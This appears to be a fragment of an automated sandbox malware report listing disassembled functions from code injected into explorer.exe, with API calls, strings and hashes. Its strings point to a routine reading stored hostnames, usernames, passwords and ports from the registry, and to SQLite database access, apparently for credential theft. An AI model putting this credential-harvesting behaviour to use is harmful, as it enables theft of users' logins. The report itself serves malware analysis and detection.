                                                                                                                                                                                                              • Opcode ID: 8b19d916a59f08b1e3ec1b0e4a7cb55cf86c6955b853c0d04d000721599463bf
                                                                                                                                                                                                              • Instruction ID: 9e5e90f81bd3448da78090b4d33b964f699d60c1370b994694ee2f5d316732e4
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8b19d916a59f08b1e3ec1b0e4a7cb55cf86c6955b853c0d04d000721599463bf
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B7414430E45352EBDF14BF39785893E3BEA9B9A710B41442EE94AA7601DB358C118F61
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 02795BF5: memset.NTDLL ref: 02795C07
                                                                                                                                                                                                              • _alldiv.NTDLL(?,?,05265C00,00000000), ref: 027960E1
                                                                                                                                                                                                              • _allrem.NTDLL(00000000,?,00000007,00000000), ref: 027960EC
                                                                                                                                                                                                              • _alldiv.NTDLL(?,?,000003E8,00000000), ref: 02796113
                                                                                                                                                                                                              • _alldiv.NTDLL(?,?,05265C00,00000000), ref: 0279618E
                                                                                                                                                                                                              • _alldiv.NTDLL(?,?,05265C00,00000000), ref: 027961B5
                                                                                                                                                                                                              • _allrem.NTDLL(00000000,?,00000007,00000000), ref: 027961C1
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000011.00000002.2248826893.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_2791000_explorer.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _alldiv$_allrem$memset
                                                                                                                                                                                                              • String ID: %.16g$%02d$%03d$%04d$%06.3f$%lld$W
                                                                                                                                                                                                              • API String ID: 2557048445-1989508764
                                                                                                                                                                                                              • Opcode ID: fb46fde008da7299ce788789359bb8fe7cd5933ab70b17ec94a84e04155c1c0a
                                                                                                                                                                                                              • Instruction ID: 88a3f47dd77db1597707376c2adbacae56962078f29e0deb15ba9c532cc00aa1
                                                                                                                                                                                                              • Opcode Fuzzy Hash: fb46fde008da7299ce788789359bb8fe7cd5933ab70b17ec94a84e04155c1c0a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: ACB15EB19083519BDF279F28ECC8F3B7FDAEB85348F940759F883A6191E721D5108A91
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memcmp.NTDLL(027E637A,BINARY,00000007), ref: 027AD324
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000011.00000002.2248826893.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_2791000_explorer.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: memcmp
                                                                                                                                                                                                              • String ID: %.16g$%lld$%s(%d)$(%.20s)$(blob)$,%d$,%s%s$BINARY$NULL$k(%d$program$vtab:%p
                                                                                                                                                                                                              • API String ID: 1475443563-3683840195
                                                                                                                                                                                                              • Opcode ID: f3d5f7575ffc9dc12fbae320fd747626aab44b062c54df13dd4f2175c0c7e760
                                                                                                                                                                                                              • Instruction ID: c9d6b94f07d7222d7e346ee32c50cf59b9b72978216f04b5106cdfe9103f9489
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f3d5f7575ffc9dc12fbae320fd747626aab44b062c54df13dd4f2175c0c7e760
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 76512671504310EBDB39CF64DC54B6BB7A7AF89220F040A69FC93AB610D770E805CBA2
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 027919E5: RegOpenKeyExW.KERNELBASE(?,?,00000000,-00000201,?,?,00000016,?,?,?,?,02791AE2,PortNumber,00000000,00000000), ref: 02791A1E
                                                                                                                                                                                                                • Part of subcall function 027919E5: RegQueryValueExW.KERNELBASE(?,?,00000000,?,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 02791A3C
                                                                                                                                                                                                                • Part of subcall function 027919E5: RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 02791A75
                                                                                                                                                                                                                • Part of subcall function 027919E5: RegCloseKey.KERNELBASE(?,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,02791AE2,PortNumber,00000000,00000000), ref: 02791A98
                                                                                                                                                                                                                • Part of subcall function 0279482C: lstrlenW.KERNEL32(?), ref: 02794845
                                                                                                                                                                                                                • Part of subcall function 0279482C: lstrlenW.KERNEL32(?), ref: 0279488F
                                                                                                                                                                                                                • Part of subcall function 0279482C: lstrlenW.KERNEL32(?), ref: 02794897
                                                                                                                                                                                                              • wsprintfW.USER32 ref: 027949A7
                                                                                                                                                                                                              • wsprintfW.USER32 ref: 027949B9
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000011.00000002.2248826893.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_2791000_explorer.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: lstrlen$QueryValuewsprintf$CloseOpen
                                                                                                                                                                                                              • String ID: %s:%u$%s:%u/%s$HostName$Password$RemoteDirectory$UserName
                                                                                                                                                                                                              • API String ID: 2889301010-4273187114
                                                                                                                                                                                                              • Opcode ID: 4eabc6fe479e348da407997052c820ad42ad59dddf5c13551195e9c0a7f64432
                                                                                                                                                                                                              • Instruction ID: 02d95f70fa4567dab9c678e607d2f1e472a340fbb4a88d05f85990c93263437a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4eabc6fe479e348da407997052c820ad42ad59dddf5c13551195e9c0a7f64432
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 47313830B043455FDF11AB69EC1492FBADEFFC9668B05491DF00997240EBB2DC028BA1
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memcpy.NTDLL(?,?,?,?,00000000), ref: 0279FB32
                                                                                                                                                                                                              • memcpy.NTDLL(?,?,00000000,00000000,000001D8,00000000,?,?,?,?,00000054,00000000,00000030,00000000,000001D8,00000000), ref: 0279FB4D
                                                                                                                                                                                                              • memcpy.NTDLL(?,?,?,00000000,000001D8,00000000,?,?,?,?,00000054,00000000,00000030,00000000,000001D8,00000000), ref: 0279FB60
                                                                                                                                                                                                              • memcpy.NTDLL(?,?,?,?,?,?,00000000,000001D8,00000000,?,?,?,?,00000054,00000000,00000030), ref: 0279FB95
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000011.00000002.2248826893.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_2791000_explorer.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: memcpy
                                                                                                                                                                                                              • String ID: -journal$-wal$immutable$nolock
                                                                                                                                                                                                              • API String ID: 3510742995-3408036318
                                                                                                                                                                                                              • Opcode ID: 5ede120ff04637c869a0c5d4aece682e961d70d807ef90e30ff86a774dffbf2c
                                                                                                                                                                                                              • Instruction ID: a8067133c4f3034666036d30dde0e764181345766a426cb129ed9acd886a162e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5ede120ff04637c869a0c5d4aece682e961d70d807ef90e30ff86a774dffbf2c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 21D1E3B16083418FDF15DF28D894B1ABBE6AF85314F18466DE899CB392D774D800CF62
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000011.00000002.2248826893.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_2791000_explorer.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: %$-x0$NaN
                                                                                                                                                                                                              • API String ID: 0-62881354
                                                                                                                                                                                                              • Opcode ID: e93e8e149405c8e2ae894cdbec5e37fbf4f69a316495eeacab3e22d9718a7375
                                                                                                                                                                                                              • Instruction ID: 860bf1ef3f1fe0cc7f190427646dd6d7dc6af1a3b1bd9860aa3d2c27f50059bb
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e93e8e149405c8e2ae894cdbec5e37fbf4f69a316495eeacab3e22d9718a7375
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 65D1D6B062C3818BDF2A8E28A49473BFBE6AFCA608F14495DF8C197351D764C945CB52
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000011.00000002.2248826893.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_2791000_explorer.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: -x0$NaN
                                                                                                                                                                                                              • API String ID: 0-3447725786
                                                                                                                                                                                                              • Opcode ID: 3d16f4b0fa9bfdc2f47c391a67ed220d0734849df4da6214ac931343859bf728
                                                                                                                                                                                                              • Instruction ID: 58049aef2f9debd611db946af0c7f977f92bd9d9198824755bec1ddb390b539f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3d16f4b0fa9bfdc2f47c391a67ed220d0734849df4da6214ac931343859bf728
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8EE106B062C3818FDF2D8E28A45473BFBE6AFCA608F18495DE8C297351D764C945CB52
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000011.00000002.2248826893.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_2791000_explorer.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: -x0$NaN
                                                                                                                                                                                                              • API String ID: 0-3447725786
                                                                                                                                                                                                              • Opcode ID: 3d6a1c9dbc5dd302ed44afef1afa339c2d185757ced3d93fdd9958ca65737138
                                                                                                                                                                                                              • Instruction ID: b93d8e9bb83acb072dbb2f415bccd7516ba2010f1470ae834bafa7f1e1513e63
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3d6a1c9dbc5dd302ed44afef1afa339c2d185757ced3d93fdd9958ca65737138
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 34E1D3B06283818BDF298E28E49473BFBE6AFCA608F14495DE8C197351D774C945CB92
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000011.00000002.2248826893.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_2791000_explorer.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: -x0$NaN
                                                                                                                                                                                                              • API String ID: 0-3447725786
                                                                                                                                                                                                              • Opcode ID: 2102c73adb5e6cdb20581e87bfa6fdbf0c818bd9c4f5faac4c85f9d4193e18cf
                                                                                                                                                                                                              • Instruction ID: 9b5b81013bb4325054e90fa01a0bec6d4a8dc259e6f615d9e275ae086fd3fbab
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2102c73adb5e6cdb20581e87bfa6fdbf0c818bd9c4f5faac4c85f9d4193e18cf
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C2E1D6B062C3818BDF298E28E49473BFBE6AFCA608F14495DE8C197351D774C945CB92
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000011.00000002.2248826893.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_2791000_explorer.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: -x0$NaN
                                                                                                                                                                                                              • API String ID: 0-3447725786
                                                                                                                                                                                                              • Opcode ID: b0c0c82611f0cdcd7fbe2fa0041b84ce9c24b7a6d12dae3adb804d55cc3bf463
                                                                                                                                                                                                              • Instruction ID: f081b50686095218aa6804e519b3aab710579a4f4ce1417a29df662c6dc8c97f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b0c0c82611f0cdcd7fbe2fa0041b84ce9c24b7a6d12dae3adb804d55cc3bf463
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3CE1C3B062C3818BDF298E28A49473BFBE6AFCA608F14495DF8C197351D764C945CB52
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _aulldvrm.NTDLL(00000000,00000002,0000000A,00000000), ref: 0279720E
                                                                                                                                                                                                              • _aullrem.NTDLL(00000000,?,0000000A,00000000), ref: 02797226
                                                                                                                                                                                                              • _aulldvrm.NTDLL(00000000,00000000,?), ref: 0279727B
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000011.00000002.2248826893.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_2791000_explorer.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _aulldvrm$_aullrem
                                                                                                                                                                                                              • String ID: -x0$NaN
                                                                                                                                                                                                              • API String ID: 105165338-3447725786
                                                                                                                                                                                                              • Opcode ID: b407be1686ebbe756cfc792c4a929da0a03ac1cba61bbf4ae5905d0e60e68a21
                                                                                                                                                                                                              • Instruction ID: 6082313baedd5d2a491f35f2fc273c9f230031f202f01cac4ec2135979031743
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b407be1686ebbe756cfc792c4a929da0a03ac1cba61bbf4ae5905d0e60e68a21
                                                                                                                                                                                                              • Instruction Fuzzy Hash: FBD1E5B062C3818BDF298E28A49473BFFE6AFCA608F18495DF8C197351D764C945CB52
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _allmul.NTDLL(00000000,?,0000000A,00000000), ref: 02798AAD
                                                                                                                                                                                                              • _allmul.NTDLL(?,?,0000000A,00000000), ref: 02798B66
                                                                                                                                                                                                              • _allmul.NTDLL(?,00000000,0000000A,00000000), ref: 02798C9B
                                                                                                                                                                                                              • _alldvrm.NTDLL(?,00000000,0000000A,00000000), ref: 02798CAE
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000011.00000002.2248826893.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_2791000_explorer.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _allmul$_alldvrm
                                                                                                                                                                                                              • String ID: .
                                                                                                                                                                                                              • API String ID: 115548886-248832578
                                                                                                                                                                                                              • Opcode ID: bc9142397b779ffab4d24058882372906306e81846aa658ac6604c74841930c4
                                                                                                                                                                                                              • Instruction ID: 16c7b08df91a148167a43f5483eed9bf809a959d29660040ba4d963d6364837c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: bc9142397b779ffab4d24058882372906306e81846aa658ac6604c74841930c4
                                                                                                                                                                                                              • Instruction Fuzzy Hash: FCD1F2B190E7858BCB109F19A48032ABBF1FFCB314F04499EF6D596281D3B58945CB87
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000011.00000002.2248826893.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_2791000_explorer.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: memset
                                                                                                                                                                                                              • String ID: ,$7$9
                                                                                                                                                                                                              • API String ID: 2221118986-1653249994
                                                                                                                                                                                                              • Opcode ID: b1d51447b54f57044a401778e5baa02a08deb2ee8b9c42d589ff759b1829e7d0
                                                                                                                                                                                                              • Instruction ID: fa2b267af89461a37ff3600748953b0ab119a4e78a194caa74281f97791a9a04
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b1d51447b54f57044a401778e5baa02a08deb2ee8b9c42d589ff759b1829e7d0
                                                                                                                                                                                                              • Instruction Fuzzy Hash: DA318D715083459FD732DF60D844BCFBBE9AF89344F00892EE98997251EB719548CBA3
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • lstrlenW.KERNEL32(00000000,00000000,?,02792E75,PathToExe,00000000,00000000), ref: 02791BCC
                                                                                                                                                                                                              • StrStrIW.SHLWAPI(00000000,.exe,?,02792E75,PathToExe,00000000,00000000), ref: 02791BF0
                                                                                                                                                                                                              • StrRChrIW.SHLWAPI(00000000,00000000,0000005C,?,02792E75,PathToExe,00000000,00000000), ref: 02791C05
                                                                                                                                                                                                              • lstrlenW.KERNEL32(00000000,?,02792E75,PathToExe,00000000,00000000), ref: 02791C1C
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000011.00000002.2248826893.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_2791000_explorer.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: lstrlen
                                                                                                                                                                                                              • String ID: .exe
                                                                                                                                                                                                              • API String ID: 1659193697-4119554291
                                                                                                                                                                                                              • Opcode ID: b6e4d7c3a5d3a358b95e7247c65256bcc67041e85546be702430fc0c244c1250
                                                                                                                                                                                                              • Instruction ID: 2f5e0d86e047eb3f5997bbf280db429177775a27a8d8eb440f0890255065535d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b6e4d7c3a5d3a358b95e7247c65256bcc67041e85546be702430fc0c244c1250
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 17F0C234B513229AEF356F34BC44ABB63A9EF0A3517519C2AE14AC7150EB708861CB69
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _allmul.NTDLL(?,00000000,00000018), ref: 027A316F
                                                                                                                                                                                                              • _allmul.NTDLL(-00000001,00000000,?,?), ref: 027A31D2
                                                                                                                                                                                                              • _alldiv.NTDLL(?,?,00000000), ref: 027A32DE
                                                                                                                                                                                                              • _allmul.NTDLL(00000000,?,00000000), ref: 027A32E7
                                                                                                                                                                                                              • _allmul.NTDLL(?,00000000,?,?), ref: 027A3392
                                                                                                                                                                                                                • Part of subcall function 027A16CD: memset.NTDLL ref: 027A172B
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000011.00000002.2248826893.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_2791000_explorer.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _allmul$_alldivmemset
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3880648599-0
                                                                                                                                                                                                              • Opcode ID: 046d8b7b3e0929ff4979f6fcf46b9aaa87e7dca74d29b1c13d3f69a449f56726
                                                                                                                                                                                                              • Instruction ID: 228e168f7616a8267a3097a891684d51b53d44e8aca86b6bb6ba682e56195257
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 046d8b7b3e0929ff4979f6fcf46b9aaa87e7dca74d29b1c13d3f69a449f56726
                                                                                                                                                                                                              • Instruction Fuzzy Hash: FBD198706083418BDB25CF69C4A4B6FBBE2AFC8728F044A6DF99597250DB70D845CF92
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000011.00000002.2248826893.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_2791000_explorer.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: FOREIGN KEY constraint failed$new$old
                                                                                                                                                                                                              • API String ID: 0-384346570
                                                                                                                                                                                                              • Opcode ID: e37a3ad241a6d1466811da576ddf503f86355205793c8b24c719774692bc7bf4
                                                                                                                                                                                                              • Instruction ID: 9072df517ea2c88470d29df82ea405f35c3001f64923677f3d37217b83c02478
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e37a3ad241a6d1466811da576ddf503f86355205793c8b24c719774692bc7bf4
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 63D11970608300AFD716EF25C885B6FBBEAAFC8754F20491EF9459B290DB74D941CB92
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _alldiv.NTDLL(000000FF,7FFFFFFF,?,?), ref: 027996E7
                                                                                                                                                                                                              • _alldiv.NTDLL(00000000,80000000,?,?), ref: 02799707
                                                                                                                                                                                                              • _alldiv.NTDLL(00000000,80000000,?,?), ref: 02799739
                                                                                                                                                                                                              • _alldiv.NTDLL(00000001,80000000,?,?), ref: 0279976C
                                                                                                                                                                                                              • _allmul.NTDLL(?,?,?,?), ref: 02799798
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000011.00000002.2248826893.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_2791000_explorer.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _alldiv$_allmul
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 4215241517-0
                                                                                                                                                                                                              • Opcode ID: aea503a78b0f5229cb44f0642643f5c49b5350688a0b94e79065ce13f3554f20
                                                                                                                                                                                                              • Instruction ID: f76e5b968a956246334fc30b5e516d8471263d392ed574cc1eeabb857b1f4c6c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: aea503a78b0f5229cb44f0642643f5c49b5350688a0b94e79065ce13f3554f20
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F221F93110439BEAFF355D257CC4B6B7ADADB99799F24092DEF1192250FE53840085B1
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _allmul.NTDLL(?,00000000,00000000), ref: 027AB1B3
                                                                                                                                                                                                              • _alldvrm.NTDLL(?,?,00000000), ref: 027AB20F
                                                                                                                                                                                                              • _allrem.NTDLL(?,00000000,?,?), ref: 027AB28A
                                                                                                                                                                                                              • memcpy.NTDLL(?,?,00000000,?,00000000,?,?,?,00000000,?,?,00000000,00000000), ref: 027AB298
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000011.00000002.2248826893.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_2791000_explorer.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _alldvrm_allmul_allremmemcpy
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1484705121-0
                                                                                                                                                                                                              • Opcode ID: fed598beaa30dbc9f388ce9cf7ff360f3efb547d5391d65c18c7c3c258da36dc
                                                                                                                                                                                                              • Instruction ID: d0ca41c761e68b8c26fd72b412abf25a3e8951de4ccda8a83f686064547b5cb6
                                                                                                                                                                                                              • Opcode Fuzzy Hash: fed598beaa30dbc9f388ce9cf7ff360f3efb547d5391d65c18c7c3c258da36dc
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D5415A716083019FC715EF25C8A4A2FBBE6AFD8318F445A2EF98597291DB31E805CF52
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetHGlobalFromStream.COMBASE(?,?), ref: 027918A7
                                                                                                                                                                                                              • GlobalLock.KERNEL32(02794B57), ref: 027918B6
                                                                                                                                                                                                              • GlobalUnlock.KERNEL32(?), ref: 027918F4
                                                                                                                                                                                                                • Part of subcall function 02791000: GetProcessHeap.KERNEL32(00000008,?,027911C7,?,?,00000001,00000000,?), ref: 02791003
                                                                                                                                                                                                                • Part of subcall function 02791000: RtlAllocateHeap.NTDLL(00000000), ref: 0279100A
                                                                                                                                                                                                              • RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 027918E8
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000011.00000002.2248826893.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_2791000_explorer.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Global$Heap$AllocateFromLockMemoryMoveProcessStreamUnlock
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1688112647-0
                                                                                                                                                                                                              • Opcode ID: 40ccbfffda725a5b8412f37157f38895c37d54e8ff73ec688a567af1eb1f6388
                                                                                                                                                                                                              • Instruction ID: 1e05cc3d657f260aad7a19624d1246f83e9631b05d40e02fcdffafece91d9276
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 40ccbfffda725a5b8412f37157f38895c37d54e8ff73ec688a567af1eb1f6388
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2A016275640357AF8F029F29A818C5F7BAEEF94265B40C42AF54987210DF32D9249A60
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • lstrlenW.KERNEL32(?,00000000,00000000,?,?,02792F0C), ref: 02791973
                                                                                                                                                                                                              • lstrlenW.KERNEL32(027E6564,?,?,02792F0C), ref: 02791978
                                                                                                                                                                                                              • lstrcatW.KERNEL32(00000000,?,?,?,02792F0C), ref: 02791990
                                                                                                                                                                                                              • lstrcatW.KERNEL32(00000000,027E6564,?,?,02792F0C), ref: 02791994
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000011.00000002.2248826893.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_2791000_explorer.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: lstrcatlstrlen
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1475610065-0
                                                                                                                                                                                                              • Opcode ID: c2d934451f9bf5ca87d1dcc9f05c80a6d24518f45aedc408fc803cd8252c0176
                                                                                                                                                                                                              • Instruction ID: 872c8112c59836ef6917805a21b407c2772020f691536674884f2761e6ea80b3
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c2d934451f9bf5ca87d1dcc9f05c80a6d24518f45aedc408fc803cd8252c0176
                                                                                                                                                                                                              • Instruction Fuzzy Hash: CBE0E56270031D1B4A2072AE6C84E7B779CCAC95A03050039FA08D7201EA62AC1446B0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 02796A81: memset.NTDLL ref: 02796A9C
                                                                                                                                                                                                              • _aulldiv.NTDLL(?,00000000,?,00000000), ref: 027BF2A1
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000011.00000002.2248826893.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_2791000_explorer.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _aulldivmemset
                                                                                                                                                                                                              • String ID: %llu$%llu
                                                                                                                                                                                                              • API String ID: 714058258-4283164361
                                                                                                                                                                                                              • Opcode ID: 08ca9f8b49f9e41129dc241cad55b7a86951026187e657b6027e582b1eace603
                                                                                                                                                                                                              • Instruction ID: 540af730eadf9392089a4ebfd9ec51402888b0aba05986466827c0bd35166b8f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 08ca9f8b49f9e41129dc241cad55b7a86951026187e657b6027e582b1eace603
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0321FCB2A402156BDB16AA24CC45FAFB75AEF85730F044329F922976C0DB21DD118FF2
                                                                                                                                                                                                              APIs
